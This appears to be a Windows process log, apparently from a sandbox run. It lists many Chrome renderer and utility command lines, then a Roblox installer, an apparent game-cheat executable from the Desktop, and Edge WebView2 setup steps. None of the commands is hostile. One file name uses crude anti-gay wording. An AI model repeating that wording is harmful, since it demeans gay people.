"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4420,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3532 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4800,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4796 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4264,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5008 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5156,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5124 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=5296,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5272 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5452,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5444 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5648,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5640 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4992,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5788 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=6048,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=6052 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=6228,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=6220 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=6352,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=6368 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=6232,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=6560 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=6700,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=6736 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=6864,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=6824 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=6720,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=7000 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=7144,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=7128 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=7252,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=7284 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=7260,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=7408 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=6044,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=7140 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=7664,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=7684 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --field-trial-handle=5612,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=7444 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --field-trial-handle=8040,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=7796 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --field-trial-handle=8188,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=8176 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --field-trial-handle=8312,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=8328 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --field-trial-handle=8500,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=8028 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --field-trial-handle=7244,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=8516 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --field-trial-handle=8768,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=8636 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --field-trial-handle=6704,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=8752 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --field-trial-handle=9024,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=9040 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --field-trial-handle=9172,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=9208 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --field-trial-handle=9356,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=8928 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --field-trial-handle=3492,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=9532 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --field-trial-handle=9796,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=9800 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --field-trial-handle=10124,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=10140 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --field-trial-handle=5780,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5772 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --field-trial-handle=10008,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=10228 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --field-trial-handle=10204,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=10372 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --field-trial-handle=10520,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=10524 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --field-trial-handle=10220,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=10648 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --field-trial-handle=3356,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=10196 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --field-trial-handle=4840,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=10548 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --field-trial-handle=10932,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=10672 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --field-trial-handle=10164,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=11228 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --field-trial-handle=3716,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=11312 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --field-trial-handle=11464,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=11496 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --field-trial-handle=11472,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=11624 /prefetch:1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --field-trial-handle=11304,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=11528 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --field-trial-handle=11340,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=10976 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --field-trial-handle=11776,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=11504 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --field-trial-handle=4876,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=12052 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --field-trial-handle=4852,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=11608 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --field-trial-handle=4864,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=12076 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --field-trial-handle=4928,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5864 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --field-trial-handle=4868,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4748 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --field-trial-handle=4796,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=12308 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --field-trial-handle=4832,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=12336 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --field-trial-handle=10404,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=12548 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --field-trial-handle=11772,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=12572 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=11940,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=12452 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --field-trial-handle=11440,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=11356 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=10792,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=10440 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=10848,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=10872 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --field-trial-handle=7592,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=7580 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --field-trial-handle=12704,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=12784 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=12556,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=12708 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=12692,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=7596 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7612,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=9880 /prefetch:8
C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe
"C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe"
C:\Users\Admin\Desktop\Debug\gay ass executor.exe
"C:\Users\Admin\Desktop\Debug\gay ass executor.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=992,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=6788 /prefetch:8
C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\WebView2RuntimeInstaller\MicrosoftEdgeWebview2Setup.exe
MicrosoftEdgeWebview2Setup.exe /silent /install
C:\Program Files (x86)\Microsoft\Temp\EU8979.tmp\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\Temp\EU8979.tmp\MicrosoftEdgeUpdate.exe" /silent /install "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers"
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
